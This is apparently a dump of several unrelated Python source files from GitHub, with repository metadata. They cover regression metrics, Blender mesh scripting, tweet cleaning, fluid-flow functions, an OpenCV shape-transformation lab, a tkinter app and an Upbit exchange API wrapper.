pol_reg = LinearRegression()
pol_reg.fit(X_poly, y_train)
b = pol_reg.predict(poly_reg.fit_transform(x_test))
print("Polynomial Regression:")
print("R2 Score:",r2_score(y_test,b))
print("Root Mean Square:",np.sqrt(mean_squared_error(y_test,b)))
print("Explained Variance Score:",explained_variance_score(y_test,b))
print("Max Error:",max_error(y_test,b))
print("Mean Gamma Deviance:",mean_gamma_deviance(y_test,b))
print("---------------------------------------------------------------------")
print(" ")



from sklearn.ensemble import RandomForestRegressor
regres = RandomForestRegressor(min_samples_split=75,min_samples_leaf=10)
hell = regres.fit(x_train,y_train)
c = regres.predict(x_test)
print("Random Forest Regression:")
print("R2 Score:",r2_score(y_test,c))
print("Root Mean Square:",np.sqrt(mean_squared_error(y_test,c)))
print("Explained Variance Score:",explained_variance_score(y_test,c))
print("Max Error:",max_error(y_test,c))
print("Mean Gamma Deviance:",mean_gamma_deviance(y_test,c))
print("---------------------------------------------------------------------")
print(" ")


from sklearn.linear_model import Lasso
lasso_reg = Lasso(normalize=True)
lasso_reg.fit(x_train,y_train)
d = lasso_reg.predict(x_test)
print("Lasso Regression:")
print("R2 Score:",r2_score(y_test,d))
print("Root Mean Square:",np.sqrt(mean_squared_error(y_test,d)))
print("Explained Variance Score:",explained_variance_score(y_test,d))
print("Max Error:",max_error(y_test,d))
print("Mean Gamma Deviance:",mean_gamma_deviance(y_test,d))
print("---------------------------------------------------------------------")
print(" ")


import scipy.stats as stats
import math
sample = np.random.choice(a=y_pred,size = 11)
sample_mean = sample.mean()
z_critical = stats.norm.ppf(q = 0.95)
pop_stdev = y_pred.std()
margin_of_error = z_critical * (pop_stdev/math.sqrt(250))
confidence_interval = (sample_mean - margin_of_error,sample_mean +
margin_of_error)
print("Confidence interval:",end=" ")
print(confidence_interval)","repo_name":"Karthivasanth/Ground_water_Quality_prediction","sub_path":"exp6 and 7.py","file_name":"exp6 and 7.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"19951938126","text":"import bpy
import mathutils
import bmesh
import numpy as np
import json

def bmesh_copy_from_object(obj, transform=True, triangulate=True, apply_modifiers=True):
    assert(obj.type == 'MESH')

    if apply_modifiers and obj.modifiers:
        me = obj.to_mesh(bpy.context.scene, True, 'PREVIEW', calc_tessface=False)
        bm = bmesh.new()
        bm.from_mesh(me)
        bpy.data.meshes.remove(me)
    else:
        me = obj.data
        if obj.mode == 'EDIT':
            bm_orig = bmesh.from_edit_mesh(me)
            bm = bm_orig.copy()
        else:
            bm = bmesh.new()
            bm.from_mesh(me)

    # Remove custom data layers to save memory
    for elem in (bm.faces, bm.edges, bm.verts, bm.loops):
        for layers_name in dir(elem.layers):
            if not layers_name.startswith("_"):
                layers = getattr(elem.layers, layers_name)
                for layer_name, layer in layers.items():
                    layers.remove(layer)

    if transform:
        bm.transform(obj.matrix_world)

    if triangulate:
        bmesh.ops.triangulate(bm, faces=bm.faces)

    return bm

def get_verts_in_group(obj, group_name):
    vg_idx = obj.vertex_groups[group_name].index
    vs = [ v for v in obj.data.vertices if vg_idx in [ vg.group for vg in v.groups ] ]
    return vs

def get_bmesh_verts(bmesh, group_vertices):
    bmesh.verts.ensure_lookup_table()

    bmesh_verts = []

    for i in range(len(group_vertices)):
        bmesh_verts.append(bmesh.verts[group_vertices[i].index])

    return bmesh_verts

def calculate_distance(inner, outer, group = '', range = False):
    bpy.context.scene.update()

    inner_bm, inner_tree = get_bmesh_and_tree(inner)
    outer_bm, outer_tree = get_bmesh_and_tree(outer)

    if group == '':
        bmesh_verts = get_bmesh_verts(outer_bm, outer.data.vertices)
    else:
        group_verts = get_verts_in_group(outer, group)
        bmesh_verts = get_bmesh_verts(outer_bm, group_verts)

    distances = []

    for v in bmesh_verts:
        loc, norm, index, dist = 
inner_tree.find_nearest(v.co)\n distances.append(dist)\n\n if range:\n return max(distances)\n else:\n return sum(distances)\n\ndef get_bmesh_and_tree(object):\n object_bmesh = bmesh_copy_from_object(object)\n\n object_tree = mathutils.bvhtree.BVHTree.FromBMesh(object_bmesh)\n\n return object_bmesh, object_tree\n\ndef select_objects():\n inner = bpy.context.object\n outer = (ob for ob in bpy.context.selected_objects if ob != inner).__next__()\n\n return inner, outer\n\ndef random_bone_movement(armature, bone_name, factor = 0.01):\n bone = armature.pose.bones[bone_name]\n\n bone.location.z += factor * (np.random.uniform() - .5)\n bone.location.y += factor * (np.random.uniform() - .5)\n bone.location.x += factor * (np.random.uniform() - .5)\n\ndef get_bone_locs(armature, bone_name):\n bone = armature.pose.bones[bone_name]\n return bone.location.x, bone.location.y, bone.location.z\n\ndef get_default_positions(armature, bone_list):\n default_position = {}\n for bone in bone_list:\n x = armature.pose.bones[bone].location.x\n y = armature.pose.bones[bone].location.y\n z = armature.pose.bones[bone].location.z\n vector = mathutils.Vector((x,y,z))\n default_position[bone] = vector\n return default_position\n\ndef reset_positions(armature, default_position):\n for bone in default_position:\n armature.pose.bones[bone].location = default_position[bone]\n\ndef collect_bone_data(armature, bone_name, factor, inner, outer, subdiv, axis):\n bone = armature.pose.bones[bone_name]\n\n axis_no = -1\n\n if axis == 'x':\n axis_no = 0\n elif axis == 'y':\n axis_no = 1\n elif axis == 'z':\n axis_no = 2\n\n distances = []\n\n default_loc = bone.location[axis_no]\n\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n movement_amount = factor/subdiv\n\n for i in range(subdiv):\n bone.location[axis_no] += ((i+1) * movement_amount)\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n bone.location[axis_no] = default_loc\n\n bone.location[axis_no] -= ((i+1) * movement_amount)\n distances.append([bone.location[axis_no], calculate_distance(inner, outer, 'raycast2')])\n\n bone.location[axis_no] = default_loc\n\n return distances\n\ndef get_mesh_data(object):\n \"\"\"We want lists of the vertices and their positions; the edges formed from\n each vertex; the faces formed by each vertex\"\"\"\n bmesh, tree = get_bmesh_and_tree(object)\n bmesh_verts = get_bmesh_verts(bmesh, object.data.vertices)\n\n mesh_data_dictionary = {'Vertices': [],\n 'Edges': [],\n 'Faces': []}\n\n for v in bmesh_verts:\n coordinates = (v.co.x, v.co.y, v.co.z)\n mesh_data_dictionary['Vertices'].append((v.index, coordinates))\n\n for e in object.data.edges:\n vertices_in_edge = []\n for v in e.vertices:\n vertices_in_edge.append(v)\n mesh_data_dictionary['Edges'].append(tuple(vertices_in_edge))\n\n for f in object.data.polygons:\n vertices_in_face = []\n for v in f.vertices:\n vertices_in_face.append(v)\n mesh_data_dictionary['Faces'].append(tuple(vertices_in_face))\n\n return mesh_data_dictionary\n\ndef get_weights(ob, group_name):\n group_index = ob.vertex_groups[group_name].index\n for i, v in enumerate(ob.data.vertices):\n for g in v.groups:\n if g.group == group_index:\n yield (i, g.weight)\n break\n\ndef get_weights_for_vxs_in_group(obj, group_name):\n bmesh, tree = get_bmesh_and_tree(obj)\n vx = get_verts_in_group(obj, group_name)\n bvx = get_bmesh_verts(bmesh, vx)\n\n all_weights = get_weights(obj, group_name)\n included_idx = []\n for v in bvx:\n 
included_idx.append(v.index)\n\n group_weights =[]\n\n for i, w in enumerate(all_weights):\n if w[0] in included_idx:\n group_weights.append(w)\n\n return group_weights\n\ndef matrix_world(armature_ob, bone_name):\n local = armature_ob.data.bones[bone_name].matrix_local\n basis = armature_ob.pose.bones[bone_name].matrix_basis\n\n parent = armature_ob.pose.bones[bone_name].parent\n if parent == None:\n return local * basis\n else:\n parent_local = armature_ob.data.bones[parent.name].matrix_local\n return matrix_world(armature_ob, parent.name) * (parent_local.inverted() * local) * basis\n\ndatapoints = 10\narmature = bpy.data.objects[\"Armature.001\"]\n\ndata_set = []\n\n\"\"\"default = get_default_positions(armature, list_of_bones)\n\nwith open('data.txt', 'w') as f:\n for item in data_set:\n f.write(\"%s\\n\" % item)\"\"\"\n\n\nbody = bpy.data.objects['24_body_0.9_1_1.001']\nthighhighs = bpy.data.objects['24_tights_0.6_1_1.001']\nshoes = bpy.data.objects['24_shoes_0.7_1_1.001']\nsuit = bpy.data.objects['24_suit_0.4_1_1.001']\ntie = bpy.data.objects['24_necktief_0.5_1_1.001']\ncollar = bpy.data.objects['24_collarf_0.6_1_1.001']\nface = bpy.data.objects['24_face_0.9_1_1.001']\nlips = bpy.data.objects['24_lips_0.4_1_1.001']\nteeth = bpy.data.objects['24_teeth_0.9_1_1.001']\nhair_front = bpy.data.objects['25_fronthair_0.4_1_1.001']\nhair_back = bpy.data.objects['25_backhair1_0.4_1_1']\nhair_back2 = bpy.data.objects['25_backhair2_0.4_1_1']\nhair_back3 = bpy.data.objects['25_backhair3_0.4_1_1']\nhair_base = bpy.data.objects['25_Hairbase_0.4_1_1']\neyeballs = bpy.data.objects['24_eyesballs_0.4_1_1.001']\niris = bpy.data.objects['24_eyes_0.8_1_1.001']\n\nmesh_objects = [body, thighhighs, shoes, suit, tie, collar, face,\nlips, teeth, hair_front, hair_back, hair_back2, hair_back3, hair_base,\neyeballs, iris]\n\nvertex_coordinates = []\nbone_coordinates = []\n\ntest_bone = armature.pose.bones[\"head lip upper middle\"]\n\ntest_bone.location = mathutils.Vector((0,0,0))\n\nbpy.context.scene.update()\n\nbm, tree = get_bmesh_and_tree(lips)\n\nvx = get_verts_in_group(lips, \"head lip upper middle\")\n\nbvx = get_bmesh_verts(bm, vx)\n\nbone_coordinates.append(tuple(test_bone.location))\nvertex_coordinates.append(tuple(bvx[0].co))\n\nfor i in range(10000):\n print(i)\n\n test_bone.location.x = (np.random.uniform() - 0.5) * 0.1\n test_bone.location.y = (np.random.uniform() - 0.5) * 0.1\n test_bone.location.z = (np.random.uniform() - 0.5) * 0.1\n\n bpy.context.scene.update()\n bm, tree = get_bmesh_and_tree(lips)\n\n vx = get_verts_in_group(lips, \"head lip upper middle\")\n\n bvx = get_bmesh_verts(bm, vx)\n\n bone_coordinates.append(tuple(test_bone.location))\n vertex_coordinates.append(tuple(bvx[0].co))\n\nbone_test_data = {'v': vertex_coordinates, 'b': bone_coordinates}\n\nwith open(\"bone_test_data.json\", \"w\") as w:\n json.dump(bone_test_data, w)\n\n\"\"\"x,y,z = get_bone_locs(armature, \"head lip upper middle\")\n\nbone_loc = (x,y,z)\n\nprint(\"Bone Location: \" + str(bone_loc))\n\n\n\nfor w in get_weights_for_vxs_in_group(lips, \"head lip upper middle\"):\n if w[0] == bvx[0].index:\n print(w)\"\"\"\n","repo_name":"chicks427/blender","sub_path":"get_mesh_data.py","file_name":"get_mesh_data.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25991733159","text":"#==========================================\n# Title: Clean and format raw tweets using regex\n# Author: Rajesh Gupta\n# Date: 2 Oct 
2018\n#==========================================\n\nimport csv, re\nfrom math import log2\nimport logging\nfrom global_vars import *\n\nclass CleanTwitterData():\n\t\n\tdef __init__(self):\n\t\tprint(\"Cleaning the tweets to retain only textual content\")\n\t\tself.compile_regex_patterns()\n\t\t\n\tdef compile_regex_patterns(self):\n\t\tself.cleaning_patterns = {\n\t\t\t\"removes_username\" : (re.compile(r'@\\w+'),' '), #removes user names from tweet\n\t\t\t\"remove_urls\":(re.compile(r'https?://\\S*'),''), #removes urls\n\t\t\t\"remove_rt\": (re.compile(r'\\brt\\b|\\.'),''), #removes retweets and fullstops\n\t\t\t\"remove_single_char\": (re.compile(r'\\s[a-z]\\s'),' '), #removes single alphabets a-z\n\t\t\t\"sub_nt_with_not\": (re.compile(r'n\\'t'),' not'), #removes n't with not\n\t\t\t\"removes_special_char\": (re.compile(r'[\\:\\(\\)\\[\\]$#-]'),' '), #removes emojis and special characters\n\t\t\t\"remove_all_but_alpha\": (re.compile(r'[^a-z\\d\\s]'),' '), #removes everything except alphabets, digits and spaces\n\t\t\t\"remove_extra_whitespaces\":(re.compile(r'\\s+'),' '), #removes additional whitespaces\n\t\t}\n\t\t\t\n\tdef clean_with_regex(self, unclean_tweets):\n\t\tlogging.info(\"Cleaning twitter data....\")\n\t\tclean_tweets = []\n\t\tfor tweet in unclean_tweets:\n\t\t\ttweet = tweet.lower() #converting all alphabets to lowercase\n\t\t\tfor remove_key, pattern in self.cleaning_patterns.items():\n\t\t\t\ttweet=pattern[0].sub(pattern[1],tweet)\n\t\t\tclean_tweets.append(tweet.strip())\n\t\treturn clean_tweets","repo_name":"rajesh-gupta-14/LookAlike_Model_B2B_Customers_NLP","sub_path":"src/clean_twitter_data.py","file_name":"clean_twitter_data.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"25865459119","text":"from math import exp, sin, cos, pi\nimport numpy as np \n\ndef alpha(nu, t):\n Uref = 1\n Lx = 1\n Ly = 1\n return Uref * exp(-4 * (pi**2) * nu * t * (1.0 / Lx ** 2 + 1.0 / Ly ** 2))\n\ndef velocity(coord, alpha):\n vel = np.zeros(coord.shape)\n Lx= 1\n Ly= 1\n x_ = 2 * pi * coord[:,0] / Lx\n y_ = 2 * pi * coord[:,1] / Ly\n vel[:,0] = np.cos(x_) * np.sin(y_) *Lx* alpha \n vel[:,1] = -np.sin(x_) * np.cos(y_) *Ly *alpha \n vel[:,2] = 0\n return vel.flatten()\n\ndef vorticity(coord, alpha):\n vort = np.zeros(coord.shape)\n Lx, Ly= (1, 1)\n x_ = 2 * pi * coord[:,0] / Lx\n y_ = 2 * pi * coord[:,1] / Ly\n vort[:,0] = 0\n vort[:,1] = 0 \n vort[:,2] = -2 * pi * (Ly / Lx + Lx / Ly) * np.cos(x_) * np.cos(y_) * alpha \n return vort.flatten()","repo_name":"maiterm/Pynama","sub_path":"src/functions/taylor_green_3d.py","file_name":"taylor_green_3d.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15945809736","text":"import cv2 as cv\nimport numpy as np\n\ndef menu():\n while True:\n print(\"Menu:\")\n print(\"1. Create a white background\")\n print(\"2. Draw rectangle\")\n print(\"3. Translation transformation\")\n print(\"4. Rotation transformation\")\n print(\"5. Scaling transformation\")\n print(\"6. 
Exit")
        print("Please select a function:", end = '')
        try:
            choice = int(input())
            if 0 < choice < 7 :
                return choice
            else:
                print("Invalid choice")
        except:
            print("Invalid choice")

def init_window(name, bg=None, width=800, height=600):
    # cv.imshow needs an image array, so default to a black canvas sized
    # like the 600x800 frames used throughout this script
    if bg is None:
        bg = np.zeros((height, width, 3), np.uint8)
    cv.namedWindow(name, cv.WINDOW_NORMAL)
    cv.imshow(name, bg)

def refresh_window():
    global name, bg, rect_coor
    #cv.destroyWindow(frame)
    bg = np.ones((600, 800, 3), np.uint8) * 255
    if rect_coor[0][0] != -1:
        pts = np.array(rect_coor)
        cv.fillPoly(bg, pts = [pts], color=(0, 255, 0))
    cv.imshow(name,bg)

def white():
    global name, bg, rect_coor
    bg = np.ones((600,800,3), np.uint8)*255
    rect_coor = [[-1,-1],
                 [-1,-1],
                 [-1,-1],
                 [-1,-1]]
    cv.imshow(name, bg)

def draw_rect(event,x,y,flags,param):
    global rect_coor,bg, draw, rect_coor
    if(event == cv.EVENT_LBUTTONDOWN):
        bg = np.ones((600, 800, 3), np.uint8)*255
        bg = cv.putText(bg, "Enter to confirm", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)
        draw = True
        rect_coor[0] = x,y
    elif (event == cv.EVENT_MOUSEMOVE):
        if draw == True:
            bg = np.ones((600, 800, 3), np.uint8) * 255
            bg = cv.putText(bg, "Enter to confirm", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)
            cv.rectangle(bg,rect_coor[0],(x,y),(0,255,0),-1)
    elif(event == cv.EVENT_LBUTTONUP):
        draw = False
        rect_coor[2] = x,y
        bg = np.ones((600, 800, 3), np.uint8) * 255
        bg = cv.putText(bg, "Enter to confirm", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)
        cv.rectangle(bg,rect_coor[0],rect_coor[2],(0,255,0),-1)
        print(rect_coor)

def rectangle():
    global name,bg
    cv.setMouseCallback(name, draw_rect)
    while True:
        bg = cv.putText(bg, "Enter to confirm", (488, 561), cv.FONT_HERSHEY_PLAIN, 1.5, (255, 0, 0), 2, cv.LINE_AA)
        cv.imshow(name,bg)
        k = cv.waitKey(1) & 0xFF
        if k == ord('\r'):
            calc_rect()
            break

def translation():
    global rect_coor
    if rect_coor[0][0] == -1:
        print("Please draw a rectangle first")
        return
    tx = int(input("Enter tx: "))
    ty = int(input("Enter ty: "))
    (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor
    x1 += tx
    x2 += tx
    x3 += tx
    x4 += tx
    y1 += ty
    y2 += ty
    y3 += ty
    y4 += ty
    rect_coor = [[x1,y1],[x2,y2],[x3,y3],[x4,y4]]

def rotation():
    global rect_coor
    if rect_coor[0][0] == -1:
        print("Please draw a rectangle first")
        return
    (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor
    angle = np.radians(int(input("Enter angle: ")))
    center = [int((x1 + x3) / 2), int((y1 + y3) / 2)]
    rot = [[np.cos(angle), np.sin(angle)],
           [-np.sin(angle), np.cos(angle)]]
    vector = [[x1-center[0],y1-center[1]],
              [x2-center[0],y2-center[1]],
              [x3-center[0],y3-center[1]],
              [x4-center[0],y4-center[1]]]
    print(vector)
    rot_v = [[vector[0][0]*rot[0][0]+vector[0][1]*rot[0][1],vector[0][0]*rot[1][0]+vector[0][1]*rot[1][1]],
             [vector[1][0]*rot[0][0]+vector[1][1]*rot[0][1],vector[1][0]*rot[1][0]+vector[1][1]*rot[1][1]],
             [vector[2][0]*rot[0][0]+vector[2][1]*rot[0][1],vector[2][0]*rot[1][0]+vector[2][1]*rot[1][1]],
             [vector[3][0]*rot[0][0]+vector[3][1]*rot[0][1],vector[3][0]*rot[1][0]+vector[3][1]*rot[1][1]]]
    print(rot_v)
    print(rect_coor)
    rect_coor = [[int(rot_v[0][0]+center[0]),int(rot_v[0][1]+center[1])],
                 [int(rot_v[1][0]+center[0]),int(rot_v[1][1]+center[1])],
                 [int(rot_v[2][0]+center[0]),int(rot_v[2][1]+center[1])],
                 [int(rot_v[3][0]+center[0]),int(rot_v[3][1]+center[1])]]
    print(rect_coor)
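
# Illustrative only (a sketch, not part of the original lab code; the helper
# name is hypothetical): the nested products in rotation() are the 2x2
# rotation matrix applied to each corner offset. With this sign convention,
# rotating the offset (1, 0) by 90 degrees about the origin gives (0, -1).
def _rotation_check(angle_deg=90):
    a = np.radians(angle_deg)
    rot = np.array([[np.cos(a), np.sin(a)],
                    [-np.sin(a), np.cos(a)]])
    return rot @ np.array([1.0, 0.0])  # ~ array([0., -1.]) for 90 degrees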
def scaling():
    global rect_coor
    if rect_coor[0][0] == -1:
        print("Please draw a rectangle first")
        return
    sx = float(input("Enter sx: "))
    sy = float(input("Enter sy: "))
    (x1,y1),(x2,y2),(x3,y3),(x4,y4) = rect_coor
    center = [int((x1+x3)/2), int((y1+y3)/2)]
    rect_coor = [[int((x1-center[0])*sx+center[0]), int((y1-center[1])*sy+center[1])],
                 [int((x2-center[0])*sx+center[0]), int((y2-center[1])*sy+center[1])],
                 [int((x3-center[0])*sx+center[0]), int((y3-center[1])*sy+center[1])],
                 [int((x4-center[0])*sx+center[0]), int((y4-center[1])*sy+center[1])]]

def calc_rect():
    global rect_coor
    pts = rect_coor
    rect_coor= [pts[0],
                [pts[0][0], pts[2][1]],
                pts[2],
                [pts[2][0], pts[0][1]]]
    print(rect_coor)

def main():
    global name, bg
    init_window(name)
    cv.waitKey(1)
    while True:
        refresh_window()
        cv.waitKey(10)
        choice = menu()
        if choice == 1:
            white()
        elif choice == 2:
            rectangle()
        elif choice == 3:
            translation()
        elif choice == 4:
            rotation()
        elif choice == 5:
            scaling()
        elif choice == 6:
            cv.destroyAllWindows()
            break
        cv.waitKey(1)

name = "Lab1"
bg = np.zeros((600,800,3), np.uint8)
rect_coor = [[-1,-1],
             [-1,-1],
             [-1,-1],
             [-1,-1]]
draw = False
main()","repo_name":"HaleFPT/CPVFPT_git","sub_path":"CPV-github/Lab tren lop/CPV301 - Group 1 - Lab1.py","file_name":"CPV301 - Group 1 - Lab1.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"41120064601","text":"import tkinter as tk


class NewApp:
    def __init__(self, arg_Text):
        self.root = tk.Tk()
        self.root.title("AwesomeApp3000")
        #
        # self.w = tk.Label(
        #     self.root, text=arg_Text, height=20, width=20, bg="gray", fg="black"
        # )
        # self.w.pack()
        #
        # self.Box2 = tk.Label(
        #     self.root,
        #     text="Hi I am Box 2",
        #     height=10,
        #     width=15,
        #     bg="green",
        #     fg="light salmon",
        # )
        # self.Box2.pack(side="right")
        #
        # self.Box3 = tk.Label(
        #     self.root,
        #     text="Hi I am Box 3",
        #     height=15,
        #     width=20,
        #     bg="MediumPurple1",
        #     fg="thistle3",
        # )
        # self.Box3.pack()
        self.NrClick = 0
        self.ButCount = tk.Label(self.root, text="You didn't click yet!")
        self.ButCount.pack()
        # bind the bound method directly; a bare plusOne name would raise
        # NameError when the button is clicked
        self.ClickerButton = tk.Button(
            self.root, text="Raise the number by one", command=self.plusOne
        )
        self.ClickerButton.pack()

        # self.Button1 = tk.Button(
        #     self.root,
        #     text="Add up",
        #     command=lambda: adding(self),
        #     height=10,
        #     width=20,
        #     fg="yellow",
        #     bg="black",
        #     activeforeground="black",
        #     activebackground="gray",
        # )
        # self.Button1.pack()
        # self.input1 = tk.StringVar()
        # self.input2 = tk.StringVar()
        # self.edit1 = tk.Entry(self.root, textvariable=self.input1)
        # self.edit2 = tk.Entry(self.root, textvariable=self.input2)
        # self.edit1.pack()
        # self.edit2.pack()

        # start the event loop last, inside __init__, so the window stays up
        self.root.mainloop()

    def plusOne(self):
        self.NrClick += 1
        self.ButCount.config(text=self.NrClick)


# def adding(self):
#     number1 = self.input1.get()
#     number2 = self.input2.get()
#     sum = float(number1) + float(number2)
#     print(sum)
#     self.w.config(text=str(sum))


NewApp("What a mess")
","repo_name":"FPirzer/Assay-CQ-ABI-2022","sub_path":"AppExercises/NewAppStart.py","file_name":"NewAppStart.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34479920651","text":"# This module will contain the decision algorithm that attributes 'credibility' weights to odometry and wifi-distance
import math



def checkOutliers(odoVal, wifiVal, thresholdPerc):
    outliers = 0
    if (abs(1-(wifiVal/(odoVal))) > thresholdPerc):
        outliers = 1
    else:
        outliers = 0
    return outliers

def getPosition(odoVal, wifiVal, outliers):
    if(outliers == 1):
        newposition = odoVal
    else:
        newposition = .5*(odoVal) + .5*wifiVal

    return newposition
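
# Illustrative usage (a sketch, not part of the original module; the helper
# name is hypothetical): with a 10% threshold, a wifi estimate within 10% of
# odometry is fused 50/50, otherwise odometry wins outright.
def _fusion_demo():
    odo, wifi = 2.0, 2.1
    outliers = checkOutliers(odo, wifi, 0.10)  # 0, since |1 - 2.1/2.0| = 0.05
    return getPosition(odo, wifi, outliers)    # 0.5*2.0 + 0.5*2.1 = 2.05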
","repo_name":"pizzajoy/Robby","sub_path":"DynamicWeightAllocation.py","file_name":"DynamicWeightAllocation.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"3842986106","text":"# -*- coding: utf-8 -*-
"""
Created on Tue Oct  6 15:37:07 2020

@author: aoust
"""

import numpy as np
import math

class QuadraticPolynomial():

    def __init__(self,n,tuples, coefs):

        self.n = n
        assert(len(tuples)==len(coefs))
        self.tuples = tuples
        self.coefs = coefs
        for (i,j) in tuples:
            assert(i<=j)

    def check(self):
        for (i,j) in self.tuples:

            assert(i<=j)

        if type(self.coefs)==list:
            self.coefs = np.array(self.coefs)

    def vpairs(self):

        for (i,j) in self.tuples:
            if ((i>=0) and (i= 2000000:
        tick_size = func(price / 1000) * 1000
    elif price >= 1000000:
        tick_size = func(price / 500) * 500
    elif price >= 500000:
        tick_size = func(price / 100) * 100
    elif price >= 100000:
        tick_size = func(price / 50) * 50
    elif price >= 10000:
        tick_size = func(price / 10) * 10
    elif price >= 1000:
        tick_size = func(price / 5) * 5
    elif price >= 100:
        tick_size = func(price / 1) * 1
    elif price >= 10:
        tick_size = func(price / 0.1) / 10
    else:
        tick_size = func(price / 0.01) / 100

    return tick_size


class UPBIT:
    def __init__(self, access, secret):
        self.access = access
        self.secret = secret


    def _request_headers(self, query=None):
        payload = {
            "access_key": self.access,
            "nonce": str(uuid.uuid4())
        }

        if query is not None:
            m = hashlib.sha512()
            m.update(urlencode(query, doseq=True).replace("%5B%5D=", "[]=").encode())
            query_hash = m.hexdigest()
            payload['query_hash'] = query_hash
            payload['query_hash_alg'] = "SHA512"

        #jwt_token = jwt.encode(payload, self.secret, algorithm="HS256").decode('utf-8')
        jwt_token = jwt.encode(payload, self.secret, algorithm="HS256")  # PyJWT >= 2.0
        authorization_token = 'Bearer {}'.format(jwt_token)
        headers = {"Authorization": authorization_token}
        return headers
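
    # Illustrative note (a sketch, not part of the original class): every
    # private call is signed the same way -- a JWT over the access key and a
    # nonce, plus a SHA512 hash of the url-encoded query when one is present.
    # Hypothetical usage:
    #   upbit = UPBIT(access, secret)
    #   headers = upbit._request_headers({"market": "KRW-BTC"})
    #   headers["Authorization"]  # "Bearer <signed JWT>"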

    #--------------------------------------------------------------------------
    # Assets
    #--------------------------------------------------------------------------
    # Query all accounts
    def get_balances(self, contain_req=False):
        """
        Query all accounts
        :param contain_req: whether to include Remaining-Req
        :return: list of the assets I hold
            [Remaining-Req is included when contain_req == True]
        """
        url = "https://api.upbit.com/v1/accounts"
        headers = self._request_headers()
        result = req._send_get_request(url, headers=headers)
        if contain_req:
            return result
        else:
            return result[0]


    def get_balance(self, ticker="KRW", contain_req=False):
        """
        Query the balance of a specific coin/KRW
        :param ticker: uppercase code identifying the currency
        :param contain_req: whether to include Remaining-Req
        :return: orderable amount/quantity (excludes amounts/quantities tied up in open orders)
            [Remaining-Req is included when contain_req == True]
        """
        try:
            # fiat-ticker
            # KRW-BTC
            if '-' in ticker:
                ticker = ticker.split('-')[1]

            balances, req = self.get_balances(contain_req=True)

            # search the current currency
            balance = 0
            for x in balances:
                if x['currency'] == ticker:
                    balance = float(x['balance'])
                    break

            if contain_req:
                return balance, req
            else:
                return balance
        except Exception as x:
            print(x.__class__.__name__)
            return None

    def get_balance_t(self, ticker='KRW', contain_req=False):
        """
        Query the balance of a specific coin/KRW (balance + locked)
        :param ticker: uppercase code identifying the currency
        :param contain_req: whether to include Remaining-Req
        :return: orderable amount/quantity (includes amounts/quantities tied up in open orders)
            [Remaining-Req is included when contain_req == True]
        """
        try:
            # KRW-BTC
            if '-' in ticker:
                ticker = ticker.split('-')[1]

            balances, req = self.get_balances(contain_req=True)

            balance = 0
            locked = 0
            for x in balances:
                if x['currency'] == ticker:
                    balance = float(x['balance'])
                    locked = float(x['locked'])
                    break

            if contain_req:
                return balance + locked, req
            else:
                return balance + locked
        except Exception as x:
            print(x.__class__.__name__)
            return None

    def get_avg_buy_price(self, ticker='KRW', contain_req=False):
        """
        Query the average purchase price of a specific coin/KRW
        :param ticker: uppercase code identifying the currency
        :param contain_req: whether to include Remaining-Req
        :return: average purchase price
            [Remaining-Req is included when contain_req == True]
        """
        try:
            # KRW-BTC
            if '-' in ticker:
                ticker = ticker.split('-')[1]

            balances, req = self.get_balances(contain_req=True)

            avg_buy_price = 0
            for x in balances:
                if x['currency'] == ticker:
                    avg_buy_price = float(x['avg_buy_price'])
                    break
            if contain_req:
                return avg_buy_price, req
            else:
                return avg_buy_price

        except Exception as x:
            print(x.__class__.__name__)
            return None

    def get_amount(self, ticker, contain_req=False):
        """
        Query the purchase amount of a specific coin/KRW
        :param ticker: uppercase currency code ('ALL' queries the total purchase amount)
        :param contain_req: whether to include Remaining-Req
        :return: purchase amount
            [Remaining-Req is included when contain_req == True]
        """
        try:
            # KRW-BTC
            if '-' in ticker:
                ticker = ticker.split('-')[1]

            balances, req = self.get_balances(contain_req=True)

            amount = 0
            for x in balances:
                if x['currency'] == 'KRW':
                    continue

                avg_buy_price = float(x['avg_buy_price'])
                balance = float(x['balance'])
                locked = float(x['locked'])

                if ticker == 'ALL':
                    amount += avg_buy_price * (balance + locked)
                elif x['currency'] == ticker:
                    amount = avg_buy_price * (balance + locked)
                    break
            if contain_req:
                return amount, req
            else:
                return amount
        except Exception as x:
            print(x.__class__.__name__)
            return None

    # endregion balance


    #--------------------------------------------------------------------------
    # Orders
    #--------------------------------------------------------------------------
    # Order availability info
    def get_chance(self, ticker, contain_req=False):
        """
        Check the order availability info for a market.
        :param ticker:
        :param contain_req: whether to include Remaining-Req
        :return: order availability info for the market
            [Remaining-Req is included when contain_req == True]
        """
        try:
            url = "https://api.upbit.com/v1/orders/chance"
            data = {"market": ticker}
            headers = self._request_headers(data)
            result = req._send_get_request(url, headers=headers, data=data)
            if contain_req:
                return result
            else:
                return result[0]
        except Exception as x:
            print(x.__class__.__name__)
            return None


    # Query an individual order
    def get_order(self, ticker_or_uuid, state='wait', kind='normal', contain_req=False):
        """
        Query the order list
        :param ticker: market
        :param state: order state (wait, done, cancel)
        :param kind: order kind (normal, watch)
        :param contain_req: whether to include Remaining-Req
        :return:
        """
